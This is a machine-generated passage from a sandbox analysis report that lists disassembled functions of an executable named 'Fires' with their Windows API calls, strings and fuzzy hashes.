SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DD4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DD4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DD4BE3

Strings

Msctls_Progress32, xrefs: 00DD4B81

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 7a1b0bcc9ad9e35707986067487a933a8bf3f2c0d217a4b083515e93191398f0
Instruction ID: fe17fe402e1c4565731b3226ee114635a9f8de36f41853a2b328e01665276aff
Opcode Fuzzy Hash: 7a1b0bcc9ad9e35707986067487a933a8bf3f2c0d217a4b083515e93191398f0
Instruction Fuzzy Hash: 951193B1150219BFEF118E65CC85EE77F6DEF08758F014112B648A2190CB72DC219BB4

Function 00D7DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7DB23: _free.LIBCMT ref: 00D7DB4C

_free.LIBCMT ref: 00D7DBAD

Part of subcall function 00D72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7DB51,00E11DC4,00000000,00E11DC4,00000000,?,00D7DB78,00E11DC4,00000007,00E11DC4,?,00D7DF75,00E11DC4), ref: 00D72D4E
Part of subcall function 00D72D38: GetLastError.KERNEL32(00E11DC4,?,00D7DB51,00E11DC4,00000000,00E11DC4,00000000,?,00D7DB78,00E11DC4,00000007,00E11DC4,?,00D7DF75,00E11DC4,00E11DC4), ref: 00D72D60

_free.LIBCMT ref: 00D7DBB8
_free.LIBCMT ref: 00D7DBC3
_free.LIBCMT ref: 00D7DC17
_free.LIBCMT ref: 00D7DC22
_free.LIBCMT ref: 00D7DC2D
_free.LIBCMT ref: 00D7DC38

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: a071c0da43f0736458b85047730191f6eb7e055eee208e3bf04a510413d405ce
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 87110D72541B44EAD531BBB0CC07FDB77FDDF14700F418C19B2ADAA152EA65B60886B0

Function 00DAE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DAE328
LoadStringW.USER32(00000000), ref: 00DAE32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DAE345
LoadStringW.USER32(00000000), ref: 00DAE34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DAE390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00DAE36D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 56043724f385bc2a3b4ff150fa0294c57104135ae42212715af8ea14b1e764aa
Instruction ID: a5fb767495bb86782b13bb55bae714769eefa854bcccfba74a9da986d315dc4e
Opcode Fuzzy Hash: 56043724f385bc2a3b4ff150fa0294c57104135ae42212715af8ea14b1e764aa
Instruction Fuzzy Hash: 170181F290030C7FEB11ABA48D89EFB776CDB09301F014592B74AE6141EA74EE848B75

Function 00DB1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00DB1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00DB1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00DB1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00DB1350
CloseHandle.KERNEL32(00000000), ref: 00DB135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00DB136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00DB1376

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: a7da802c540e0b0cac64a6a4e398574ef289c1184528caf22bbfddd5a99e3890
Instruction ID: 8b7a7be4ce04a85e1bcee8cffeeb93ac86464554d21b464a399924532c4a1086
Opcode Fuzzy Hash: a7da802c540e0b0cac64a6a4e398574ef289c1184528caf22bbfddd5a99e3890
Instruction Fuzzy Hash: 5DF0EC32043712FBDB411B54EE49BDABB7AFF05302F841122F102D19A097749471CFA4

Function 00DC26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DC281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DC283E
WSAGetLastError.WSOCK32 ref: 00DC284F
htons.WSOCK32(?,?,?,?,?), ref: 00DC2938
inet_ntoa.WSOCK32(?), ref: 00DC28E9

Part of subcall function 00DA433E: _strlen.LIBCMT ref: 00DA4348

Part of subcall function 00DC3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00DBF669), ref: 00DC3C9D

_strlen.LIBCMT ref: 00DC2992

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: f8863c97208bdead4327e4d96496e411c40bb337a41cb86110e79b7ec88b3440
Instruction ID: e3762ee91d8c0746787f7ba7c358094e5382de9f5673e662338a93a80904e372
Opcode Fuzzy Hash: f8863c97208bdead4327e4d96496e411c40bb337a41cb86110e79b7ec88b3440
Instruction Fuzzy Hash: E3B1A035604301AFD724DF24C895F2ABBA5EF84318F58855CF4968B2A2DB31ED46CBB1

Function 00D70527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00D7042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D70446
__allrem.LIBCMT ref: 00D7045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D7047B
__allrem.LIBCMT ref: 00D70492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D704B0

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: e125739998a70f8a9e9cb1464884473d019d77fc64fe0221b3c147c9adc51473
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 6381B472600B05DBE724AF69CC81B6A7BE9EF45324F28C12EE659D66C1F770D90087B4

Function 00D76571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D68649,00D68649,?,?,?,00D767C2,00000001,00000001,8BE85006), ref: 00D765CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D767C2,00000001,00000001,8BE85006,?,?,?), ref: 00D76651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D7674B
__freea.LIBCMT ref: 00D76758

Part of subcall function 00D73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D66A79,?,0000015D,?,?,?,?,00D685B0,000000FF,00000000,?,?), ref: 00D73BC5

__freea.LIBCMT ref: 00D76761
__freea.LIBCMT ref: 00D76786

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 9f836e7eeafcf0c2b8aff1672c51645793451a95947fa3d0c14380c89dfbb5e3
Instruction ID: 294e08979320e9c2bea4710429395cf4ff023dd1d1b56e8556f87a3312c0bda2
Opcode Fuzzy Hash: 9f836e7eeafcf0c2b8aff1672c51645793451a95947fa3d0c14380c89dfbb5e3
Instruction Fuzzy Hash: AC510472600616AFDB298F64CC82EBF77AAEB40794F188669FC0CD6140FB35DC5496B0

Function 00DCC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DCC10E,?,?), ref: 00DCD415
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD451
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD4C8
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DCC72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DCC785
RegCloseKey.ADVAPI32(00000000), ref: 00DCC7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DCC7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DCC853
RegCloseKey.ADVAPI32(?), ref: 00DCC85F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 167d52e8566075760b52eb8cc160072929145a6680a16dda78227b8e08a38007
Instruction ID: d9fd5c70a86b5208203f49968c07769469c6080d86664cdb9454e9701148949d
Opcode Fuzzy Hash: 167d52e8566075760b52eb8cc160072929145a6680a16dda78227b8e08a38007
Instruction Fuzzy Hash: 79817D71118242AFC714DF24C885F2ABBE5FF84308F1895ADF5598B2A2DB31ED45CBA1

Function 00DA009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00DA00A9
SysAllocString.OLEAUT32(00000000), ref: 00DA0150
VariantCopy.OLEAUT32(00DA0354,00000000), ref: 00DA0179
VariantClear.OLEAUT32(00DA0354), ref: 00DA019D
VariantCopy.OLEAUT32(00DA0354,00000000), ref: 00DA01A1
VariantClear.OLEAUT32(?), ref: 00DA01AB

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 04bcaea3cbaf27d2d5c8d56a0b0d2f49ba32d392a5d05e2d4139c70f8b112d42
Instruction ID: 4d6b57d3c2b36dfd390e94923f77566570309ad655ee72ba11af332bac904131
Opcode Fuzzy Hash: 04bcaea3cbaf27d2d5c8d56a0b0d2f49ba32d392a5d05e2d4139c70f8b112d42
Instruction Fuzzy Hash: B851C535600310EBCF20AB649889B69BBA5EF47311F249447E906DF296DB70DC44CBBA

Function 00DB9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00D441EA: _wcslen.LIBCMT ref: 00D441EF

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00DB9F2A
_wcslen.LIBCMT ref: 00DB9F4B
_wcslen.LIBCMT ref: 00DB9F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00DB9FCA

Strings

X, xrefs: 00DB9E57

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 6160811e4de4db4020c674f1fdad60c81e15c32092e84157c249f3db2fa7992a
Instruction ID: 1d79470c6474f7e8c81135fc1e60c7e7720bc0f06cecc55990fd8efd33f16ca3
Opcode Fuzzy Hash: 6160811e4de4db4020c674f1fdad60c81e15c32092e84157c249f3db2fa7992a
Instruction Fuzzy Hash: 4DE14D31504340DFD724EF25C891AAAB7E5EF85314F04856DF98A9B2A2DB31DD05CBB2

Function 00DB6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DB6F21
CoInitialize.OLE32(00000000), ref: 00DB707E
CoCreateInstance.OLE32(00DE0CC4,00000000,00000001,00DE0B34,?), ref: 00DB7095
CoUninitialize.OLE32 ref: 00DB7319

Strings

.lnk, xrefs: 00DB6EFF, 00DB6F69, 00DB7025

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: c84ed6f7124650bbbc902c08f9d6270cb0f9ec85af9e0c8bf4f1ae780cfb3228
Instruction ID: 6f13402e148f4323ce9c232e84077f4132f783fc01b91c8712f43a3320272477
Opcode Fuzzy Hash: c84ed6f7124650bbbc902c08f9d6270cb0f9ec85af9e0c8bf4f1ae780cfb3228
Instruction Fuzzy Hash: 16D13771508301AFC304EF24C881AABB7E8FF98744F44496DF5969B262DB71ED45CBA2

Function 00DB1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00DB11B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DB11EE
EnterCriticalSection.KERNEL32(?), ref: 00DB120A
LeaveCriticalSection.KERNEL32(?), ref: 00DB1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DB129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00DB12C8

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 7bdedc6f1d3dbbb19e77d88f5888a23927402a2e2eb3b0ddd45f5f927af842c8
Instruction ID: 40a367be5cc6d5db79804d8ba92b8f73707a865bba3ab4baf77fcaf53d0af12d
Opcode Fuzzy Hash: 7bdedc6f1d3dbbb19e77d88f5888a23927402a2e2eb3b0ddd45f5f927af842c8
Instruction Fuzzy Hash: 52416975900305EFDF04AF94DC85AAABBB9FF05300F1440A5E900EA296DB34DE55CBB4

Function 00DD8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00D9FBEF,00000000,?,?,00000000,?,00D839E2,00000004,00000000,00000000), ref: 00DD8CA7
EnableWindow.USER32(?,00000000), ref: 00DD8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DD8D2C
ShowWindow.USER32(?,00000004), ref: 00DD8D40
EnableWindow.USER32(?,00000001), ref: 00DD8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DD8D8A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: abee1c695e8348bcd003205bd0233b9e782b0365f315de6fb5939dcbb23351d9
Instruction ID: 7651ff19503f97706424a716d69866253e3702205d10950fd57592de674bf6b3
Opcode Fuzzy Hash: abee1c695e8348bcd003205bd0233b9e782b0365f315de6fb5939dcbb23351d9
Instruction Fuzzy Hash: 11418830602244EFDB26DF29C885BE57BF2FB45704F1840ABE5095B3A2C7315859DB70

Function 00DC2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00DC2D45

Part of subcall function 00DBEF33: GetWindowRect.USER32(?,?), ref: 00DBEF4B

GetDesktopWindow.USER32 ref: 00DC2D6F
GetWindowRect.USER32(00000000), ref: 00DC2D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DC2DB2
GetCursorPos.USER32(?), ref: 00DC2DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DC2E3C

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: df27ac563c6d07f5e8d0b5810e1c89d4328424fe9edb1b8cb7322c15119821ff
Instruction ID: 08d3a5f78464bc2725759848875f9ccd1039fedf6dc4095b21dc2ef71995101f
Opcode Fuzzy Hash: df27ac563c6d07f5e8d0b5810e1c89d4328424fe9edb1b8cb7322c15119821ff
Instruction Fuzzy Hash: 6231CF72505316ABCB20DF549845FAAB7AAFB85314F040A1EF496D7281DA30E9098BF2

Function 00DA55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00DA55F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DA5616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DA564E
_wcslen.LIBCMT ref: 00DA566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DA5674
_wcsstr.LIBVCRUNTIME ref: 00DA567E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 2248361abfb2a7de1955145e58e4d4da366f2c0c096392ab0f7d390cba54a5c2
Instruction ID: b5800e157ae3761bf883a32d323ac1dc05befd1d3b7781988cc85f30462b8fa7
Opcode Fuzzy Hash: 2248361abfb2a7de1955145e58e4d4da366f2c0c096392ab0f7d390cba54a5c2
Instruction Fuzzy Hash: 43213532204604BBEB155B39EC49E7F7FADDF46720F18802AF806CA195EB65CC4186B0

Function 00DB6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D455D1,?,?,00D84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D45871

_wcslen.LIBCMT ref: 00DB62C0
CoInitialize.OLE32(00000000), ref: 00DB63DA
CoCreateInstance.OLE32(00DE0CC4,00000000,00000001,00DE0B34,?), ref: 00DB63F3
CoUninitialize.OLE32 ref: 00DB6411

Strings

.lnk, xrefs: 00DB62BB, 00DB6306, 00DB63CA

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
